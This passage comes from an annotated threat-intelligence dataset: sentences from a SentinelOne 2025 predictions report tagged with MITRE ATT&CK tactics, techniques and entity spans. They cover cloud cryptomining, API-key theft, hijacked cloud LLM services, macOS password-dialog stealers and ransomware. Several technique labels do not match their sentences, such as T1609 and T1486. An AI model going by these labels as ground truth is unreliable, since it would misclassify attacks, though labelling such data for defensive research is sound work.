"sentinel-67_SentinelOne_report-p1-s30-732394", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "This will create additional confusion and mistrust around AI, which will in turn exacerbate the existing confusion and different positions.", "sentence_text": "Steve Stone, SVP Threat Intelligence & Managed Hunting Increased Targeting of Poorly Monitored and Understood Technologies In 2025, threat actors will increasingly focus on exploiting technologies that are both ubiquitous and poorly secured, allowing them to evade detection and operate with relative impunity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Threat actors exploit poorly secured technologies to evade detection and operate with relative impunity.", "entities": [ { "text": "threat actors", "start": 132, "end": 145, "label": "ThreatActor" }, { "text": "exploiting technologies", "start": 173, "end": 196, "label": "Action" }, { "text": "evade detection", "start": 259, "end": 274, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s31-4468d3", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Steve Stone, SVP Threat Intelligence & Managed Hunting Increased Targeting of Poorly Monitored and Understood Technologies In 2025, threat actors will increasingly focus on exploiting technologies that are both ubiquitous and poorly secured, allowing them to evade detection and operate with relative impunity.", "sentence_text": "Exploiting such under-monitored technologies will enable attackers to breach networks, track high-value individuals, and outmaneuver defenders constrained by the inherent limitations of these systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": null, "procedure": "Breach networks, track high-value individuals, and outmaneuver defenders using under-monitored technologies", "entities": [ { "text": "attackers", "start": 57, "end": 66, "label": "ThreatActor" }, { "text": "breach networks, track high-value individuals, and outmaneuver defenders", "start": 70, "end": 142, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s32-c69b24", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Exploiting such under-monitored technologies will enable attackers to breach networks, track high-value individuals, and outmaneuver defenders constrained by the inherent limitations of these systems.", "sentence_text": "Much of the current cloud threat landscape consists of financially motivated actors who deploy cryptominers or steal API keys to abuse the victim’s service for attacks like spamming.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1550", "name": "Use Alternate Authentication Material" } ], "procedure": "Deploy cryptominers or steal API keys to abuse cloud services for attacks like spamming", "entities": [ { "text": " financially motivated actors", "start": 54, "end": 83, "label": "ThreatActor" }, { "text": "cryptominers", "start": 95, "end": 107, "label": "MalwareTool" }, { "text": "API keys", "start": 117, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "deploy cryptominers or steal API keys to abuse the victim’s service for attacks like spamming.", "start": 88, "end": 182, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s33-64e07c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Much of the current cloud threat landscape consists of financially motivated actors who deploy cryptominers or steal API keys to abuse the victim’s service for attacks like spamming.", "sentence_text": "In most cases, these payouts are relatively small and are often initiated by actors who live in developing countries where the minimal financial gain is worth the effort invested.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s34-840444", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "In most cases, these payouts are relatively small and are often initiated by actors who live in developing countries where the minimal financial gain is worth the effort invested.", "sentence_text": "The phenomenal rise of AI is a topic many are tired of hearing about, but it is clear that AI has made a massive impact on the world and how businesses operate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s35-cfe981", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "The phenomenal rise of AI is a topic many are tired of hearing about, but it is clear that AI has made a massive impact on the world and how businesses operate.", "sentence_text": "As AI demand and adoption increases, most of these organizations will turn to cloud-hosted AI solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s36-69096d", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "As AI demand and adoption increases, most of these organizations will turn to cloud-hosted AI solutions.", "sentence_text": "As with any huge technological breakthrough — such as mobile or cloud computing itself — actors will find ways to exploit this new attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s37-5721cf", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "As with any huge technological breakthrough — such as mobile or cloud computing itself — actors will find ways to exploit this new attack surface.", "sentence_text": "In 2024, we saw actors using AI to improve their tools.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1609", "name": "Container Administration Command" } ], "procedure": "using AI to improve attack tools", "entities": [ { "text": "actors", "start": 16, "end": 22, "label": "ThreatActor" }, { "text": " tools.", "start": 48, "end": 55, "label": "MalwareTool" }, { "text": " using AI to improve their tools.", "start": 22, "end": 55, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s38-ec93a5", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "In 2024, we saw actors using AI to improve their tools.", "sentence_text": "Perhaps more telling was a report where actors hijacked cloud-hosted AI services and used the victim’s LLM and infrastructure to power the actor’s illicit activities.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Attackers hijack cloud-hosted AI services and leverage the victim’s LLM and infrastructure to support illicit operations.", "entities": [ { "text": "actors", "start": 40, "end": 46, "label": "ThreatActor" }, { "text": "hijacked cloud-hosted AI services", "start": 47, "end": 80, "label": "Action" }, { "text": "used the victim’s LLM and infrastructure to power the actor’s illicit activities", "start": 85, "end": 165, "label": "Action" }, { "text": "cloud-hosted AI services", "start": 56, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "victim’s LLM", "start": 94, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "infrastructure", "start": 111, "end": 125, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s39-b3fe1f", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "Perhaps more telling was a report where actors hijacked cloud-hosted AI services and used the victim’s LLM and infrastructure to power the actor’s illicit activities.", "sentence_text": "That attack resulted in an LLM application that provided interactions that were non-compliant with the usual protections built into the service.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The attack causes an LLM application to produce outputs that bypass built-in protection mechanisms.", "entities": [ { "text": "LLM application", "start": 27, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "provided interactions that were non-compliant with the usual protections", "start": 48, "end": 120, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s40-a21c1c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "That attack resulted in an LLM application that provided interactions that were non-compliant with the usual protections built into the service.", "sentence_text": "The victim’s cloud service account paid for the actor’s compute and tokens.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "misused victim cloud account to pay for attacker compute and tokens", "entities": [ { "text": "actor", "start": 48, "end": 53, "label": "ThreatActor" }, { "text": "victim’s cloud service account", "start": 4, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "paid for the actor’s compute and tokens.", "start": 35, "end": 75, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s41-c974ee", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "The victim’s cloud service account paid for the actor’s compute and tokens.", "sentence_text": "This attack will likely serve as a blueprint for other cloud-hosted AI service takeover activities in 2025 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s42-b82f4d", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "This attack will likely serve as a blueprint for other cloud-hosted AI service takeover activities in 2025 .", "sentence_text": "The scope will surely expand beyond LLMs to other forms of AI tools, such as image and video generators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s43-9da8d1", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "The scope will surely expand beyond LLMs to other forms of AI tools, such as image and video generators.", "sentence_text": "Ultimately, businesses should evaluate the types of AI-powered applications that they use and how they could be exploited by actors for the actor’s own motives or for profit, with the latter likely to rise in frequency.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "exploit AI-powered applications for actor’s motives or profit", "entities": [ { "text": "AI-powered applications ", "start": 52, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "exploited by actors for the actor’s own motives or for profit", "start": 112, "end": 173, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s44-8f4a84", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Ultimately, businesses should evaluate the types of AI-powered applications that they use and how they could be exploited by actors for the actor’s own motives or for profit, with the latter likely to rise in frequency.", "sentence_text": "Cloud-based AI applications are expensive, and expense increases with the complexity of the project.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s45-b557cc", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "Cloud-based AI applications are expensive, and expense increases with the complexity of the project.", "sentence_text": "Actors have been selling API keys for cloud and SaaS-based AI services throughout 2024.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1550", "name": "Use Alternate Authentication Material" } ], "procedure": "selling API keys for cloud and SaaS-based AI services", "entities": [ { "text": "Actors", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "API keys for cloud and SaaS-based AI services", "start": 25, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "selling ", "start": 17, "end": 25, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s46-6252ad", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "Actors have been selling API keys for cloud and SaaS-based AI services throughout 2024.", "sentence_text": "In 2025, expect to see increased demand for monetization of hacked AI and cloud resources.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "monetization of hacked AI and cloud resources", "entities": [ { "text": "AI and cloud resources.", "start": 67, "end": 90, "label": "Infrastructure_Indicator" }, { "text": " monetization", "start": 43, "end": 56, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s47-baea8c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "In 2025, expect to see increased demand for monetization of hacked AI and cloud resources.", "sentence_text": "While the “Macs don’t get malware” trope has been sufficiently disproven by reality , there is still a strong sense of “but they’re safer than the rest”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s48-5c89e9", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "While the “Macs don’t get malware” trope has been sufficiently disproven by reality , there is still a strong sense of “but they’re safer than the rest”.", "sentence_text": "This perception isn’t shared by threat actors, but it’s a natural inference among users weary of Windows’ appalling reputation for security and faced with an exponentially larger mountain of malware targeting the Microsoft platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s49-c8a98e", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "This perception isn’t shared by threat actors, but it’s a natural inference among users weary of Windows’ appalling reputation for security and faced with an exponentially larger mountain of malware targeting the Microsoft platform.", "sentence_text": "Perception can be a dangerous thing, particularly when organizations are allocating stretched resources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s50-c0d3fc", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Perception can be a dangerous thing, particularly when organizations are allocating stretched resources.", "sentence_text": "These stealers eschew persistence and seek to steal everything from a single intrusion, including credentials for online and cloud accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": null, "procedure": "Stealers avoid persistence and attempt to steal credentials and other data from a single intrusion.", "entities": [ { "text": "These stealers", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "eschew persistence", "start": 15, "end": 33, "label": "Action" }, { "text": "steal everything", "start": 46, "end": 62, "label": "Action" }, { "text": "credentials for online and cloud accounts", "start": 98, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s51-089a89", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "These stealers eschew persistence and seek to steal everything from a single intrusion, including credentials for online and cloud accounts.", "sentence_text": "Any malware that successfully spoofs the password dialog box ‘to install’ a fake program immediately gains the keys to the kingdom.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Spoofs password dialog box to install a fake program and gains full access", "entities": [ { "text": "malware that successfully spoofs the password dialog", "start": 4, "end": 56, "label": "MalwareTool" }, { "text": "spoofs the password dialog box ‘to install’ a fake program", "start": 30, "end": 88, "label": "Action" }, { "text": " gains", "start": 100, "end": 106, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s52-b7d9a7", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Any malware that successfully spoofs the password dialog box ‘to install’ a fake program immediately gains the keys to the kingdom.", "sentence_text": "Coming to the attackers’ aid in all this is the built-in AppleScript that makes faking a legit-looking password dialog box a trivial task.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1064", "name": "Scripting" } ], "procedure": "Use AppleScript to fake a legitimate password dialog box", "entities": [ { "text": "AppleScript", "start": 57, "end": 68, "label": "MalwareTool" }, { "text": " faking a legit-looking password dialog box ", "start": 79, "end": 123, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s53-2e9d12", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "Coming to the attackers’ aid in all this is the built-in AppleScript that makes faking a legit-looking password dialog box a trivial task.", "sentence_text": "There’s no quick fix for either the “universal password” or the easy-to-fake password dialog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s54-d2b06a", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "There’s no quick fix for either the “universal password” or the easy-to-fake password dialog.", "sentence_text": "These are technologies that have been baked into the OS since its earliest days; nobody should expect Apple to address these any time soon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s55-328898", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "These are technologies that have been baked into the OS since its earliest days; nobody should expect Apple to address these any time soon.", "sentence_text": "Consequently, we expect malware authors to continue abusing both throughout 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s56-36d71c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "Consequently, we expect malware authors to continue abusing both throughout 2025.", "sentence_text": "Two key defensive strategies for organizations :\nMandate password managers and educate users to stay away from Apple’s built-in Passwords app and Keychain for storing corporate credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s57-c59ea6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "Two key defensive strategies for organizations :\nMandate password managers and educate users to stay away from Apple’s built-in Passwords app and Keychain for storing corporate credentials.", "sentence_text": "Install a\ntrusted security solution to cover the many gaps in Apple’s infrequently updated XProtect malware rules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s58-9db3c8", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "Install a\ntrusted security solution to cover the many gaps in Apple’s infrequently updated XProtect malware rules.", "sentence_text": "Unlike smash-and-grab infostealers, more focused adversaries with nation-state objectives like espionage still maintain an interest in persistence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s59-73fc3f", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "Unlike smash-and-grab infostealers, more focused adversaries with nation-state objectives like espionage still maintain an interest in persistence.", "sentence_text": "We’ve seen them exploring different ways to keep a foothold on a compromised device since Apple introduced user notifications for background login items in Ventura.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Maintain foothold on a compromised device", "entities": [ { "text": "o keep a foothold on a compromised device", "start": 42, "end": 83, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s60-388273", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "We’ve seen them exploring different ways to keep a foothold on a compromised device since Apple introduced user notifications for background login items in Ventura.", "sentence_text": "Easily the most persistent behaviour on any device is that of the user themselves; consequently, compromising software the user is known or required to run will likely be a firm favorite in the year ahead .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s61-9ba1da", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "Easily the most persistent behaviour on any device is that of the user themselves; consequently, compromising software the user is known or required to run will likely be a firm favorite in the year ahead .", "sentence_text": "Keep a careful eye on productivity apps that are mandated across the organization as well as IDEs and other development tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s62-caeaa7", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "Keep a careful eye on productivity apps that are mandated across the organization as well as IDEs and other development tools.", "sentence_text": "They can, and are, regularly compromised and need to be factored into the organization’s overall security strategy as a primary target for threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s63-09cfc4", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "They can, and are, regularly compromised and need to be factored into the organization’s overall security strategy as a primary target for threat actors.", "sentence_text": "As concerns over privacy and surveillance grow, a broader segment of non-technical users will prioritize secure messaging and email platforms to safeguard personal communications from both domestic and foreign monitoring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s64-a9f508", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "As concerns over privacy and surveillance grow, a broader segment of non-technical users will prioritize secure messaging and email platforms to safeguard personal communications from both domestic and foreign monitoring.", "sentence_text": "As encrypted services gain mainstream acceptance, they will also attract heightened attention from cybercriminals and nation-state actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s65-07e26d", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "As encrypted services gain mainstream acceptance, they will also attract heightened attention from cybercriminals and nation-state actors.", "sentence_text": "Threats will evolve to include interception or theft of encrypted data during transmission , exploitation of vulnerabilities in these platforms, and the misuse of secure communication tools as part of malicious campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Interception or theft of encrypted data; exploitation of vulnerabilities; misuse of secure communication tools", "entities": [ { "text": "interception or theft of encrypted data", "start": 31, "end": 70, "label": "Action" }, { "text": "exploitation of vulnerabilities", "start": 93, "end": 124, "label": "Action" }, { "text": "misuse of secure communication tools", "start": 153, "end": 189, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s66-7e72c8", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "Threats will evolve to include interception or theft of encrypted data during transmission , exploitation of vulnerabilities in these platforms, and the misuse of secure communication tools as part of malicious campaigns.", "sentence_text": "This dual dynamic—public reliance on encryption for privacy and its targeting by adversaries—will make encrypted communication services both a critical safeguard and a high-value target in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s67-f7bcf2", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "This dual dynamic—public reliance on encryption for privacy and its targeting by adversaries—will make encrypted communication services both a critical safeguard and a high-value target in 2025.", "sentence_text": "Neither is Your Data There are now more organized ransomware operations than ever before.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s68-0c6f81", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "Neither is Your Data There are now more organized ransomware operations than ever before.", "sentence_text": "Tools are improving and the already minimal barriers of entry are continuing to erode.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s69-12edb1", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "Tools are improving and the already minimal barriers of entry are continuing to erode.", "sentence_text": "Additionally, powerful ransomware platforms and tools such as LockBit and ALPHV builders have been shared and leaked widely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s70-d204f8", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "Additionally, powerful ransomware platforms and tools such as LockBit and ALPHV builders have been shared and leaked widely.", "sentence_text": "Ransomware is now a commodity tool available to threat actors across the spectrum of capability and sentiment, and this will continue into 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s71-3748e0", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "Ransomware is now a commodity tool available to threat actors across the spectrum of capability and sentiment, and this will continue into 2025.", "sentence_text": "Additionally, actors like Dispossessor and RansomHub have monetized data even after the victim complied with demands.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Monetize data after ransom compliance", "entities": [ { "text": "Dispossessor", "start": 26, "end": 38, "label": "ThreatActor" }, { "text": "RansomHub", "start": 43, "end": 52, "label": "ThreatActor" }, { "text": "monetized data", "start": 58, "end": 72, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s72-fcbde6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "Additionally, actors like Dispossessor and RansomHub have monetized data even after the victim complied with demands.", "sentence_text": "Paying a ransomware actor in return for their promise to delete data is a ruse.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Deceptive promise to delete data", "entities": [ { "text": "ransomware actor", "start": 9, "end": 25, "label": "ThreatActor" }, { "text": "promise to delete data", "start": 46, "end": 68, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s73-bf14d6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "Paying a ransomware actor in return for their promise to delete data is a ruse.", "sentence_text": "Compromised data lives on through rogue affiliates and communities that are dedicated to amplifying breach data to malicious communities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s74-75e501", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "Compromised data lives on through rogue affiliates and communities that are dedicated to amplifying breach data to malicious communities.", "sentence_text": "Breached data has no end-of-life, and these threat actors do not honor “contracts” Protecting data and preventing these attacks in the early states is more critical than ever going into 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s75-9aa1b1", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "Breached data has no end-of-life, and these threat actors do not honor “contracts” Protecting data and preventing these attacks in the early states is more critical than ever going into 2025.", "sentence_text": "While some folks in the cybersecurity community have long argued for targeted assassinations or extrajudicial renditions of cybercrime actors, the US policy community has remained largely opposed to this option.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s76-0bfcf6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "While some folks in the cybersecurity community have long argued for targeted assassinations or extrajudicial renditions of cybercrime actors, the US policy community has remained largely opposed to this option.", "sentence_text": "Although the incoming administration is looking to cut defense aid to Ukraine, many appointees take a more nuanced view of the issue than the president-elect’s language suggests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s77-0823d9", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "Although the incoming administration is looking to cut defense aid to Ukraine, many appointees take a more nuanced view of the issue than the president-elect’s language suggests.", "sentence_text": "Owing to all this White House jockeying, Ukraine’s government is likely to pursue a strategy of demonstrating its usefulness to the Trump administration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s78-126d6f", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "Owing to all this White House jockeying, Ukraine’s government is likely to pursue a strategy of demonstrating its usefulness to the Trump administration.", "sentence_text": "Ukraine’s view is based on President-elect Trump’s history of transactional foreign policy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s79-388f76", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "Ukraine’s view is based on President-elect Trump’s history of transactional foreign policy.", "sentence_text": "Ukraine’s proximity to cybercriminal targets and their recent operational history of successful assassinations in Russia (subscription required) make their security services the perfect proxy for US officials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s80-96fbe4", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "Ukraine’s proximity to cybercriminal targets and their recent operational history of successful assassinations in Russia (subscription required) make their security services the perfect proxy for US officials.", "sentence_text": "Such killings could come proactively from the Ukrainian government as a show of good faith, in an effort to keep US defense aid flowing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s81-6ea1c2", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "Such killings could come proactively from the Ukrainian government as a show of good faith, in an effort to keep US defense aid flowing.", "sentence_text": "We won’t know if such actions are ever approved or requested until the supporting documents are declassified in 50 years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s82-539975", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "We won’t know if such actions are ever approved or requested until the supporting documents are declassified in 50 years.", "sentence_text": "But, don’t be surprised if ransomware affiliates suddenly start dying in fiery car crashes or drowning while on their yachts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s83-34c29f", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "But, don’t be surprised if ransomware affiliates suddenly start dying 